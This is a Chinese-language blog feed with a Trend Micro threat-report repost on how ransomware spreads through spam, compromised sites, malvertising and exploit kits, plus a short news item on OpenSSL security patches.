除了要瞭解勒索病毒加密以外的策略和技術外，了解它們如何進入環境也相同的重要。趨勢科技最近的分析顯示大多數勒索病毒 Ransomware (勒索軟體/綁架病毒)家族可以在暴露層（exposure layer）加以阻止 – 網頁和電子郵件，事實上，從2016年1月到5月，趨勢科技已經封鎖66,00萬多次勒索病毒相關的垃圾郵件(SPAM)、惡意網址和威脅。

有越來越多網路犯罪分子利用勒索病毒作為武器，因為其有利可圖；僅在過去的六個月，就有超過50個新家族出現，而2014到2015年加起來也只有49個。在最近幾年，讓勒索病毒成功的一個重要因素是其勒索的技巧，主要是利用目標對失去自己電腦掌控的恐懼，網路犯罪分子不斷發展他們的技術 – 從簡單的鎖定使用者螢幕、假造聯邦執法單位警告，到實際去動到資料。

許多關於勒索病毒 Ransomware 討論集中在檔案部分，但往往忽略了散播機制，主要是因為沒有創新性，勒索病毒的幕後黑手只是利用萬無一失的電子郵件和網頁策略，雖然簡單，但這些策略大多會讓使用者不易察覺，且這樣的策略可以繞過傳統的安全解決方案。

在本篇文章中，我們會仔細檢視勒索病毒常用的攻擊媒介，以及我們如何在它們抵達之前減少其造成的風險。

*並不創新的垃圾郵件做法:社交工程***

讓我們來看看勒索病毒所用的垃圾郵件策略及它如何能夠躲過垃圾郵件過濾程式。在一般情況下，勒索病毒相關的垃圾郵件包含惡意附件檔，可能是巨集、JavaScript等形式，這些是下載真正勒索病毒的下載程式。一個例子是CryptoLocker，它有惡意附件檔（通常是UPATRE變種）會下載ZeuS / ZBOT，這個資料竊取惡意軟體接著會下載並在系統執行CryptoLocker。

但網路犯罪分子並非就此停住。有些加密勒索家族會加上另外一層 – 巨集，一種用來繞過沙箱技術的老策略，會要求使用者手動啟用內嵌在惡意附件文件內的巨集來感染系統，在這裡，社交工程social engineering誘餌和對人心的了解起了關鍵的作用。Locky加密勒索病毒是充分利用惡意巨集附件檔的知名例子，甚至會利用表格物件（也在巨集中發現）來隱藏惡意程式碼，這個勒索病毒在2月攻擊了好萊塢長老教會醫療中心，根據報導，Locky在5月底至6月初沉寂一陣子後又再度出現。

圖1、Locky相關垃圾郵件

趨勢科技也觀察到JavaScript附件檔會自動下載勒索病毒變種如XORBAT、ZIPPY、TeslaCrypt 4.0、CryptoWall 3.0和Locky；另一個腳本語言VBScript也被網路惡意分子用來散播Locky及CERBER，除了混淆技術外，使用腳本作為附件也有可能躲過掃描程式。

圖2、CryptoWall 3.0相關JS檔案的混淆過程式碼

勒索病毒常見網路釣魚郵件主旨

勒索病毒幕後的網路犯罪分子所用的電子郵件主旨都很普通，我們看過會偽裝成履歷、發票、出貨通知和帳號終止通知等，此外，也有些會假冒成來自合法來源。

圖3、某些勒索病毒家族如TorrentLocker所用的典型主旨

圖4、TorrentLocker相關垃圾郵件範例

TorrentLocker一直在澳洲和歐洲困擾著使用者和企業，尤其是利用垃圾郵件攻擊活動，此一區域性威脅並非使用典型的主旨，而是針對內容量身打造，從所使用的語言到假冒的寄件者都是根據目標對象所在的國家制定。例如在澳洲，垃圾郵件會假冒成來自澳洲聯邦警察、澳洲郵局或其他本地公司，有趣的是，這些垃圾郵件只會寄送給合法的電子郵件帳戶以躲過反垃圾郵件偵測，也就是說，如果垃圾郵件使用義大利公司名稱，就只會送給義大利使用者。

CryptoWall偏好早上5點到9點間發釣魚信； TorrentLocker喜歡在下午1點到7點間發信

攻擊者要發送垃圾郵件給組織和中小企業也會選擇有效率的時間。例如，CryptoWall會在早上5點到9點間抵達使用者信箱；而TorrentLocker相關電子郵件會在周間的下午1點到7點間送出，會符合目標對象的工作時間。最後，並非一次寄送大量垃圾郵件來淹沒信箱，網路犯罪分子會最佳化送信時間，在一天內分多次小量寄送，這樣一來，傳統垃圾郵件過濾程式就不會將此當作可疑活動。

發垃圾信不用殭屍網路改用被駭郵件伺服器

在過去，趨勢科技注意到攻擊者停止使用「Botnet傀儡殭屍網路」發送垃圾郵件而選擇使用被駭的郵件伺服器。魚叉式網路釣魚 (Spear Phishing )防護解決方案可以防護電子郵件閘道，因為能夠透過封鎖已知惡意寄件者和內容來解決上述的垃圾郵件攻擊，因此，它不會進入使用者的收件夾，也就不會被勒索病毒感染系統。

使用新聞網站,雲端服務等合法網站散播

勒索病毒也被放在惡意網址或被駭網站上，合法的網頁伺服器也可能受駭而將使用者系統導到惡意網站，雖然這並非新手法也並不令人驚奇，受駭網站仍是避免網路封鎖技術的有效作法。

在一起事件中，攻擊者入侵新聞網站的部落格網頁，The Independent在2015年12月散播了TeslaCrypt 2.0，瀏覽該部落格網頁的使用者會遭遇到一連串的重新導向動作，包括放有Angler漏洞攻擊套件的網站，如果系統上有此Adobe Flash Player漏洞（CVE-2015-7645），就會感染此一勒索病毒。

除了入侵網站外，網路惡意分子也會濫用合法服務來代管他們的惡意檔案。一個例子是PETYA，利用了雲端儲存網站Dropbox，技術上來講，它仍然是透過垃圾郵件抵達，內含應該連到履歷文件的Dropbox網址，但實際上是惡意軟體。

*設定惡意等網域存活期間僅一小時,避免被封鎖***

TorrentLocker會利用驗證碼機制（CAPTCHA）來避免登錄網頁被封鎖、「Drive by download」路過式下載偵測或自動化偵測。之前，網路犯罪分子在登記DNS紀錄時會設定短存留時間（TTL），這意味著相關聯的惡意網域只會在短時間內（約1小時）活著並可存取，這當然會造成封鎖勒索病毒相關網址的困難，另一方面，也會將TOR 洋蔥路由器用在匿名目的上。

瀏覽網路惡意廣告就中招

漏洞攻擊套件經由惡意廣告來散播許多勒索病毒家族。當使用者瀏覽任何有惡意廣告的網站時，未經修補的系統就有可能面臨各種感染威脅，包括了勒索病毒。

在下表中是各種漏洞攻擊套件所散播的不同勒索病毒家族：

漏洞攻擊套件	散播的勒索病毒 (2015)	散播的勒索病毒 (2016)
Angler Exploit Kit	CryptoWall, TeslaCrypt, CryptoLocker	CryptoWall, TeslaCrypt, CryptoLocker, CryptXXX
Neutrino Exploit Kit	CryptoWall, TeslaCrypt	CryptoWall, TeslaCrypt, Cerber, CryptXXX
Magnitude Exploit Kit	CryptoWall	CryptoWall, Cerber
Rig Exploit Kit	CryptoWall, TeslaCrypt	Ransom_GOOPIC
Nuclear Exploit Kit	CryptoWall, TeslaCrypt, CTB-Locker, Troldesh	TeslaCrypt, Locky
Sundown Exploit Kit		CryptoShocker
Hunter Exploit Kit		Locky
Fiesta Exploit Kit	TeslaCrypt

今年，我們看到Angler漏洞攻擊套件會派送TeslaCrypt，但當其首腦在4月決定關閉運作，Angler開始散播CryptXXX。說到停止活動，去年最活躍漏洞攻擊套件Angler的運作看來要走上末路了，一些報導認為這是因為Angler的背後攻擊者可能會遭受逮捕。

實際上，有些網路惡意分子正使用其他的漏洞攻擊套件，如Neutrino和Rig。就像 CryptXXX和Locky勒索病毒就正透過Neutrino與Nuclear漏洞攻擊套件派送。

保持系統更新在最新狀態可以防止漏洞攻擊套件和惡意廣告所散播的任何威脅，在這一點上，具備強大網頁信譽評比服務及漏洞防護屏蔽技術的解決方案可以有效地封鎖惡意網址和保護系統免於漏洞攻擊。

趨勢科技的解決方案如何保護網路邊界？

對抗勒索病毒來保護網路和珍貴資料的最好辦法是在進入點加以解決，一旦它到達端點，都難免會需要辛苦地回復檔案或重新取回系統的控制權。當這些威脅在網路內散播並感染其他系統甚至是伺服器時就更加危險了，有鑑於勒索病毒的本質，使用傳統防毒解決方案已經不再足夠。因此，我們主張組織和中小企業必須使用多層次防禦。

圖5、對抗勒索病毒的多層次防禦

趨勢科技提供的解決方案能夠在暴露層（exposure layer）或閘道阻止勒索病毒。企業可以利用趨勢科技的Deep Discovery Email Inspector來封鎖和偵測勒索病毒相關電子郵件，包括惡意附件檔。其客製化沙箱技術也可以偵測勒索病毒變種，包括使用巨集的惡意軟體。在此解決方案內的IP和網頁信譽評比技術也能夠在暴露層（exposure layer）來封鎖已知電子網址和寄件者。

我們強大的端點解決方案，趨勢科技 Smart Protection Suite 可以透過行為監控、應用程式控制和漏洞防護來發現並阻止惡意行為和活動進行。我們的防勒索病毒功能可以主動偵測和封鎖勒索病毒執行。也因此不會讓檔案被加密，威脅也不會擴散至網路內的其他系統或進入伺服器。

關於網路防護，趨勢科技的Deep Discovery Inspector可以透過惡意軟體沙箱和網路掃描功能來偵測和封鎖網路上的勒索病毒。此外，我們的產品也可以防止橫向移動到網路的其他部分。趨勢科技Deep Security可以阻止勒索病毒進入企業伺服器 – 無論是實體、虛擬或位在雲端。它保護系統和伺服器不被漏洞攻擊套件利用弱點來派送勒索病毒。

對於中小企業，Worry-Free Pro透過Hosted Email Security來提供基於雲端的電子郵件閘道安全防護。它的端點防護也提供了如行為監控和即時網頁信譽評比技術等多項功能來偵測和封鎖勒索病毒。

使用者也可以利用我們的免費工具，如趨勢科技的螢幕鎖定勒索病毒移除工具，可以用來偵測和移除螢幕鎖定勒索病毒；還有趨勢科技加密勒索病毒檔案解密工具，可以解密特定加密勒索病毒所加密的檔案而無須支付贖金或使用解密金鑰。

文章來源:http://blog.trendmicro.com.tw/?p=21912

圖片來源:https://pixabay.com/

The post 勒索病毒的攻擊媒介了無新意,為何能繞過傳統的安全解決方案? first appeared on 捕夢網 Blog.

OpenSSL修補兩個高嚴重性漏洞

pumoadmin55 — Thu, 05 May 2016 01:59:30 +0000

新釋出的版本修補了兩個重大漏洞，其中一個屬「密文填塞」漏洞，能藉由傳遞不同填充內容的加密訊息至伺服器進行驗證，並依據回應內容解密。另一個重大漏洞屬於記憶體毀損漏洞，出現在OpenSSL所使用的ASN.1編碼器中，可允許駭客執行任意程式。

OpenSSL本周釋出了OpenSSL 1.0.1t與OpenSSL 1.0.2h以修補2個高嚴重性及4個低嚴重性安全漏洞。

其中一個高嚴重性漏洞的代號為CVE-2016-2107，屬於「密文填塞」（Padding Oracle）漏洞，藉由傳遞不同填充內容的加密訊息至伺服器進行驗證，並依據回應內容解密。該漏洞出現於伺服器支援AES-NI且採用AES CBC加密連結的狀況下，將允許駭客解密通訊流量。

另一個高嚴重性漏洞則是CVE-2016-2108，為一記憶體毀損漏洞，出現在OpenSSL所使用的ASN.1編碼器中，CVE-2016-2108其實是由兩個低風險的臭蟲所構成，但彼此牽動便會造成嚴重的後果，可允許駭客執行任意程式。

OpenSSL建議OpenSSL 1.0.1與OpenSSL 1.0.2的用戶儘快升級到最新版本。

文章來源:http://www.ithome.com.tw/news/105728